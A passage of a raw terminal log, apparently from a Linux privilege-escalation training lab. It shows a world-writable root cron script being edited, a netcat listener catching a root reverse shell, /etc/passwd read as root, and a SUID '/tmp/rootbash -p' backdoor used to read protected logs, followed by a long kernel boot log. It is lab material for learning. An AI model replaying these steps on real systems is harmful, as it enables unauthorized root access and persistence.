73347 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
73452 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
735#
736* * * * * root overwrite.sh
737* * * * * root /usr/local/bin/compress.sh
738
739user@debian:~/tools/mysql-udf$ locate overwrite.sh
740locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 247.7 days)
741/usr/local/bin/overwrite.sh
742user@debian:~/tools/mysql-udf$ ls -l /usr/local/bin/overwrite.sh
743-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
744user@debian:~/tools/mysql-udf$ cd /usr/local/bin/
745user@debian:/usr/local/bin$ ls
746compress.sh overwrite.sh suid-env suid-env2 suid-so
747user@debian:/usr/local/bin$ cat overwrite.sh
748#!/bin/bash
749
750echo `date` > /tmp/useless
751user@debian:/usr/local/bin$ nano overwrite.sh
752user@debian:/usr/local/bin$ nc -nvlp 4444
753listening on [any] 4444 ...
754connect to [10.10.170.166] from (UNKNOWN) [10.10.170.166] 37728
755allexport off
756braceexpand on
757emacs on
758errexit off
759errtrace off
760functrace off
761hashall on
762histexpand on
763history on
764ignoreeof off
765interactive-comments on
766keyword off
767monitor off
768noclobber off
769noexec off
770noglob off
771nolog off
772notify off
773nounset off
774onecmd off
775physical off
776pipefail off
777posix off
778privileged off
779verbose off
780vi off
781xtrace off
782id
783uid=0(root) gid=0(root) groups=0(root)
784ls
785cat /etc/passwd
786root:x:0:0:root:/root:/bin/bash
787daemon:x:1:1:daemon:/usr/sbin:/bin/sh
788bin:x:2:2:bin:/bin:/bin/sh
789sys:x:3:3:sys:/dev:/bin/sh
790sync:x:4:65534:sync:/bin:/bin/sync
791games:x:5:60:games:/usr/games:/bin/sh
792man:x:6:12:man:/var/cache/man:/bin/sh
793lp:x:7:7:lp:/var/spool/lpd:/bin/sh
794mail:x:8:8:mail:/var/mail:/bin/sh
795news:x:9:9:news:/var/spool/news:/bin/sh
796uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
797proxy:x:13:13:proxy:/bin:/bin/sh
798www-data:x:33:33:www-data:/var/www:/bin/sh
799backup:x:34:34:backup:/var/backups:/bin/sh
800list:x:38:38:Mailing List Manager:/var/list:/bin/sh
801irc:x:39:39:ircd:/var/run/ircd:/bin/sh
802gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
803nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
804libuuid:x:100:101::/var/lib/libuuid:/bin/sh
805Debian-exim:x:101:103::/var/spool/exim4:/bin/false
806sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
807user:x:1000:1000:user,,,:/home/user:/bin/bash
808statd:x:103:65534::/var/lib/nfs:/bin/false
809mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
810bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
811user@debian:/usr/local/bin$
812
813login as: user
814user@10.10.170.166's password:
815Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
816
817The programs included with the Debian GNU/Linux system are free software;
818the exact distribution terms for each program are described in the
819individual files in /usr/share/doc/*/copyright.
820
821Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
822permitted by applicable law.
823Last login: Sun Jan 17 21:14:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
824user@debian:~$ dmesg | grep /var/log/messages > l33t.txt
825user@debian:~$ cat l33t.txt
826user@debian:~$ ls
827l33t.txt myvpn.ovpn tools
828user@debian:~$ cat l33t.txt
829user@debian:~$ ls
830l33t.txt myvpn.ovpn tools
831user@debian:~$ dmesg | grep /var/log/messages
832user@debian:~$ tail -f /var/log/messages
833tail: cannot open `/var/log/messages' for reading: Permission denied
834user@debian:~$ tail -f /var/log/messages | less
835user@debian:~$ tail -f /var/log/auth.log
836tail: cannot open `/var/log/auth.log' for reading: Permission denied
837user@debian:~$ /tmp/rootbash -p
838rootbash-4.1# tail -f /var/log/messages
839Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
840Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
841Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
842Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
843Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
844Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
845Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
846Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
847Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
848Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
849
850
851
852
853
854ls
855^C
856rootbash-4.1# cat /var/log/messages
857May 15 06:25:03 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1345" x-info="http://www.rsyslog.com"] rsyslogd was HUPed, type 'lightweight'.
858May 15 11:32:35 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
859May 15 11:32:35 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] (re)start
860May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
861May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
862May 15 11:32:35 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
863May 15 11:32:35 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
864May 15 11:32:35 debian kernel: [ 0.000000] KERNEL supported cpus:
865May 15 11:32:35 debian kernel: [ 0.000000] Intel GenuineIntel
866May 15 11:32:35 debian kernel: [ 0.000000] AMD AuthenticAMD
867May 15 11:32:35 debian kernel: [ 0.000000] Centaur CentaurHauls
868May 15 11:32:35 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
869May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
870May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
871May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
872May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 00000000f0000000 (usable)
873May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
874May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000100000000 - 00000003d0000000 (usable)
875May 15 11:32:35 debian kernel: [ 0.000000] DMI 2.7 present.
876May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0x3d0000 max_arch_pfn = 0x400000000
877May 15 11:32:35 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
878May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0xf0000 max_arch_pfn = 0x400000000
879May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-00000000f0000000
880May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000100000000-00000003d0000000
881May 15 11:32:35 debian kernel: [ 0.000000] RAMDISK: 37709000 - 37fefa59
882May 15 11:32:35 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
883May 15 11:32:35 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
884May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
885May 15 11:32:35 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
886May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
887May 15 11:32:35 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
888May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
889May 15 11:32:35 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
890May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
891May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
892May 15 11:32:35 debian kernel: [ 0.000000] No NUMA configuration found
893May 15 11:32:35 debian kernel: [ 0.000000] Faking a node at 0000000000000000-00000003d0000000
894May 15 11:32:35 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-00000003d0000000
895May 15 11:32:35 debian kernel: [ 0.000000] NODE_DATA [0000000000017000 - 000000000001efff]
896May 15 11:32:35 debian kernel: [ 0.000000] bootmap [000000000001f000 - 0000000000098fff] pages 7a
897May 15 11:32:35 debian kernel: [ 0.000000] (8 early reservations) ==> bootmem [0000000000 - 03d0000000]
898May 15 11:32:35 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
899May 15 11:32:35 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
900May 15 11:32:35 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
901May 15 11:32:35 debian kernel: [ 0.000000] #3 [0037709000 - 0037fefa59] RAMDISK ==> [0037709000 - 0037fefa59]
902May 15 11:32:35 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
903May 15 11:32:35 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
904May 15 11:32:35 debian kernel: [ 0.000000] #6 [0000008000 - 000000b000] PGTABLE ==> [0000008000 - 000000b000]
905May 15 11:32:35 debian kernel: [ 0.000000] #7 [000000b000 - 0000017000] PGTABLE ==> [000000b000 - 0000017000]
906May 15 11:32:35 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
907May 15 11:32:35 debian kernel: [ 0.000000] Zone PFN ranges:
908May 15 11:32:35 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
909May 15 11:32:35 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
910May 15 11:32:35 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x003d0000
911May 15 11:32:35 debian kernel: [ 0.000000] Movable zone start PFN for each node
912May 15 11:32:35 debian kernel: [ 0.000000] early_node_map[3] active PFN ranges
913May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
914May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x000f0000
915May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00100000 -> 0x003d0000
916May 15 11:32:35 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
917May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
918May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x02] enabled)
919May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
920May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled)
921May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
922May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
923May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
924May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
925May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
926May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
927May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
928May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
929May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
930May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
931May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
932May 15 11:32:35 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
933May 15 11:32:35 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
934May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
935May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
936May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
937May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
938May 15 11:32:35 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
939May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
940May 15 11:32:35 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 11 hotplug CPUs
941May 15 11:32:35 debian kernel: [ 0.000000] Xen version 4.2.
942May 15 11:32:35 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
943May 15 11:32:35 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
944May 15 11:32:35 debian kernel: [ 0.000000] You might have to change the root device
945May 15 11:32:35 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
946May 15 11:32:35 debian kernel: [ 0.000000] in your root= kernel command line option
947May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
948May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
949May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
950May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000f0000000 - 00000000fc000000
951May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000fc000000 - 0000000100000000
952May 15 11:32:35 debian kernel: [ 0.000000] Allocating PCI resources starting at f0000000 (gap: f0000000:c000000)
953May 15 11:32:35 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
954May 15 11:32:35 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
955May 15 11:32:35 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff88000ee00000 s90392 r8192 d24296 u131072
956May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
957May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
958May 15 11:32:35 debian kernel: [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 3877290
959May 15 11:32:35 debian kernel: [ 0.000000] Policy zone: Normal
960May 15 11:32:35 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
961May 15 11:32:35 debian kernel: [ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
962May 15 11:32:35 debian kernel: [ 0.000000] Initializing CPU#0
963May 15 11:32:35 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
964May 15 11:32:35 debian kernel: [ 0.000000] Checking aperture...
965May 15 11:32:35 debian kernel: [ 0.000000] No AGP bridge found
966May 15 11:32:35 debian kernel: [ 0.000000] PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
967May 15 11:32:35 debian kernel: [ 0.000000] Placing 64MB software IO TLB between ffff88000efde000 - ffff880012fde000
968May 15 11:32:35 debian kernel: [ 0.000000] software IO TLB at phys 0xefde000 - 0x12fde000
969May 15 11:32:35 debian kernel: [ 0.000000] Memory: 15426784k/15990784k available (3087k kernel code, 262536k absent, 301464k reserved, 2036k data, 592k init)
970May 15 11:32:35 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
971May 15 11:32:35 debian kernel: [ 0.000000] Hierarchical RCU implementation.
972May 15 11:32:35 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
973May 15 11:32:35 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
974May 15 11:32:35 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
975May 15 11:32:35 debian kernel: [ 0.000000] console [ttyS0] enabled
976May 15 11:32:35 debian kernel: [ 0.000000] Detected 2500.068 MHz processor.
977May 15 11:32:35 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 5000.13 BogoMIPS (lpj=10000272)
978May 15 11:32:35 debian kernel: [ 0.008000] Security Framework initialized
979May 15 11:32:35 debian kernel: [ 0.008000] SELinux: Disabled at boot.
980May 15 11:32:35 debian kernel: [ 0.008000] Dentry cache hash table entries: 2097152 (order: 12, 16777216 bytes)
981May 15 11:32:35 debian kernel: [ 0.008000] Inode-cache hash table entries: 1048576 (order: 11, 8388608 bytes)
982May 15 11:32:35 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
983May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys ns
984May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
985May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys devices
986May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
987May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
988May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
989May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
990May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
991May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
992May 15 11:32:35 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
993May 15 11:32:35 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
994May 15 11:32:35 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 62 no PMU driver, software events only.
995May 15 11:32:35 debian kernel: [ 0.009289] ACPI: Core revision 20090903
996May 15 11:32:35 debian kernel: [ 0.012133] Not enabling x2apic, Intr-remapping init failed.
997May 15 11:32:35 debian kernel: [ 0.012135] Setting APIC routing to physical flat
998May 15 11:32:35 debian kernel: [ 0.014214] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
999May 15 11:32:35 debian kernel: [ 0.053966] CPU0: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1000May 15 11:32:35 debian kernel: [ 0.053982] installing Xen timer for CPU 0
1001May 15 11:32:35 debian kernel: [ 0.054162] Booting processor 1 APIC 0x2 ip 0x6000
1002May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#1
1003May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1004May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1005May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1006May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1007May 15 11:32:35 debian kernel: [ 0.008000] CPU 1/0x2 -> Node 0
1008May 15 11:32:35 debian kernel: [ 0.140804] CPU1: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1009May 15 11:32:35 debian kernel: [ 0.140859] checking TSC synchronization [CPU#0 -> CPU#1]: passed.
1010May 15 11:32:35 debian kernel: [ 0.144005] installing Xen timer for CPU 1
1011May 15 11:32:35 debian kernel: [ 0.144084] Booting processor 2 APIC 0x1 ip 0x6000
1012May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#2
1013May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1014May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1015May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1016May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1017May 15 11:32:35 debian kernel: [ 0.008000] CPU 2/0x1 -> Node 0
1018May 15 11:32:35 debian kernel: [ 0.232868] CPU2: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1019May 15 11:32:35 debian kernel: [ 0.232929] checking TSC synchronization [CPU#0 -> CPU#2]: passed.
1020May 15 11:32:35 debian kernel: [ 0.236007] installing Xen timer for CPU 2
1021May 15 11:32:35 debian kernel: [ 0.236108] Booting processor 3 APIC 0x3 ip 0x6000
1022May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#3
1023May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1024May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1025May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1026May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1027May 15 11:32:35 debian kernel: [ 0.008000] CPU 3/0x3 -> Node 0
1028May 15 11:32:35 debian kernel: [ 0.324780] CPU3: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1029May 15 11:32:35 debian kernel: [ 0.324850] checking TSC synchronization [CPU#0 -> CPU#3]: passed.
1030May 15 11:32:35 debian kernel: [ 0.328005] installing Xen timer for CPU 3
1031May 15 11:32:35 debian kernel: [ 0.328025] Brought up 4 CPUs
1032May 15 11:32:35 debian kernel: [ 0.328027] Total of 4 processors activated (20196.33 BogoMIPS).
1033May 15 11:32:35 debian kernel: [ 0.328773] devtmpfs: initialized
1034May 15 11:32:35 debian kernel: [ 0.332061] regulator: core version 0.5
1035May 15 11:32:35 debian kernel: [ 0.332072] NET: Registered protocol family 16
1036May 15 11:32:35 debian kernel: [ 0.332156] ACPI: bus type pci registered
1037May 15 11:32:35 debian kernel: [ 0.332387] PCI: Using configuration type 1 for base access
1038May 15 11:32:35 debian kernel: [ 0.332873] bio: create slab <bio-0> at 0
1039May 15 11:32:35 debian kernel: [ 0.379117] ACPI: Interpreter enabled
1040May 15 11:32:35 debian kernel: [ 0.379119] ACPI: (supports S0 S3 S4 S5)
1041May 15 11:32:35 debian kernel: [ 0.379133] ACPI: Using IOAPIC for interrupt routing
1042May 15 11:32:35 debian kernel: [ 0.457794] ACPI: No dock devices found.
1043May 15 11:32:35 debian kernel: [ 0.457956] ACPI: PCI Root Bridge [PCI0] (0000:00)
1044May 15 11:32:35 debian kernel: [ 0.462736] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1045May 15 11:32:35 debian kernel: [ 0.462737] * this clock source is slow. Consider trying other clock sources
1046May 15 11:32:35 debian kernel: [ 0.463902] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1047May 15 11:32:35 debian kernel: [ 0.699319] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1048May 15 11:32:35 debian kernel: [ 0.699698] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1049May 15 11:32:35 debian kernel: [ 0.700019] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1050May 15 11:32:35 debian kernel: [ 0.700380] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1051May 15 11:32:35 debian kernel: [ 0.700653] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1052May 15 11:32:35 debian kernel: [ 0.700655] vgaarb: loaded
1053May 15 11:32:35 debian kernel: [ 0.700693] PCI: Using ACPI for IRQ routing
1054May 15 11:32:35 debian kernel: [ 0.700693] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1055May 15 11:32:35 debian kernel: [ 0.700693] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1056May 15 11:32:35 debian kernel: [ 0.700693] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1057May 15 11:32:35 debian kernel: [ 0.708028] Switching to clocksource xen
1058May 15 11:32:35 debian kernel: [ 0.709101] pnp: PnP ACPI init
1059May 15 11:32:35 debian kernel: [ 0.709113] ACPI: bus type pnp registered
1060May 15 11:32:35 debian kernel: [ 0.747539] pnp: PnP ACPI: found 12 devices
1061May 15 11:32:35 debian kernel: [ 0.747541] ACPI: ACPI bus type pnp unregistered
1062May 15 11:32:35 debian kernel: [ 0.747551] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1063May 15 11:32:35 debian kernel: [ 0.747557] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1064May 15 11:32:35 debian kernel: [ 0.747558] system 00:03: ioport range 0xcc0-0xccf has been reserved
1065May 15 11:32:35 debian kernel: [ 0.747560] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1066May 15 11:32:35 debian kernel: [ 0.747566] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1067May 15 11:32:35 debian kernel: [ 0.747568] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1068May 15 11:32:35 debian kernel: [ 0.752641] NET: Registered protocol family 2
1069May 15 11:32:35 debian kernel: [ 0.752920] IP route cache hash table entries: 524288 (order: 10, 4194304 bytes)
1070May 15 11:32:35 debian kernel: [ 0.754409] TCP established hash table entries: 524288 (order: 11, 8388608 bytes)
1071May 15 11:32:35 debian kernel: [ 0.755645] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes)
1072May 15 11:32:35 debian kernel: [ 0.755800] TCP: Hash tables configured (established 524288 bind 65536)
1073May 15 11:32:35 debian kernel: [ 0.755801] TCP reno registered
1074May 15 11:32:35 debian kernel: [ 0.755887] NET: Registered protocol family 1
1075May 15 11:32:35 debian kernel: [ 0.755899] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1076May 15 11:32:35 debian kernel: [ 0.755960] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1077May 15 11:32:35 debian kernel: [ 0.756004] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1078May 15 11:32:35 debian kernel: [ 0.756087] Unpacking initramfs...
1079May 15 11:32:35 debian kernel: [ 0.897823] Freeing initrd memory: 9114k freed
1080May 15 11:32:35 debian kernel: [ 0.900160] audit: initializing netlink socket (disabled)
1081May 15 11:32:35 debian kernel: [ 0.900169] type=2000 audit(1589556748.331:1): initialized
1082May 15 11:32:35 debian kernel: [ 0.903195] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1083May 15 11:32:35 debian kernel: [ 0.904442] VFS: Disk quotas dquot_6.5.2
1084May 15 11:32:35 debian kernel: [ 0.904488] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1085May 15 11:32:35 debian kernel: [ 0.904546] msgmni has been set to 30148
1086May 15 11:32:35 debian kernel: [ 0.905183] alg: No test for stdrng (krng)
1087May 15 11:32:35 debian kernel: [ 0.905239] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1088May 15 11:32:35 debian kernel: [ 0.905241] io scheduler noop registered
1089May 15 11:32:35 debian kernel: [ 0.905242] io scheduler anticipatory registered
1090May 15 11:32:35 debian kernel: [ 0.905243] io scheduler deadline registered
1091May 15 11:32:35 debian kernel: [ 0.905276] io scheduler cfq registered (default)
1092May 15 11:32:35 debian kernel: [ 0.905491] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1093May 15 11:32:35 debian kernel: [ 0.905526] Grant table initialized
1094May 15 11:32:35 debian kernel: [ 0.907463] Linux agpgart interface v0.103
1095May 15 11:32:35 debian kernel: [ 0.907481] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
